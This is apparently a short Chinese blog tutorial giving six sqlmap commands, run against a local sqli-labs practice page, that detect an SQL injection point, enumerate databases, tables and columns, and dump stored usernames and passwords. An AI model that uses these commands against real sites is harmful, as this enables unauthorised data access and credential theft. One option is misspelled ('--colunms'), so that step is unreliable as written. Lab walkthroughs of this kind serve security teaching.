第一步:判断是否有注入点
sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1"

第二步:获取数据库
sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --dbs

第三步:查看但前应用程序所用数据库
sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --current-db

第四步:列出指定数据的所有的表
sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" -D "security" --tables

第五步:读取指定表中的字段名称
sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" -D "security" -T users --colunms

第六步:读取指定字段内容
sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" -D "security" -T users -C username,password --dump

本文详细介绍了SQL注入攻击的过程,包括利用sqlmap工具探测注入点、获取数据库信息、列举数据表及字段,最后读取敏感数据。通过这个过程,读者可以深入理解SQL注入的威胁及防范措施。

被折叠的 条评论
为什么被折叠?



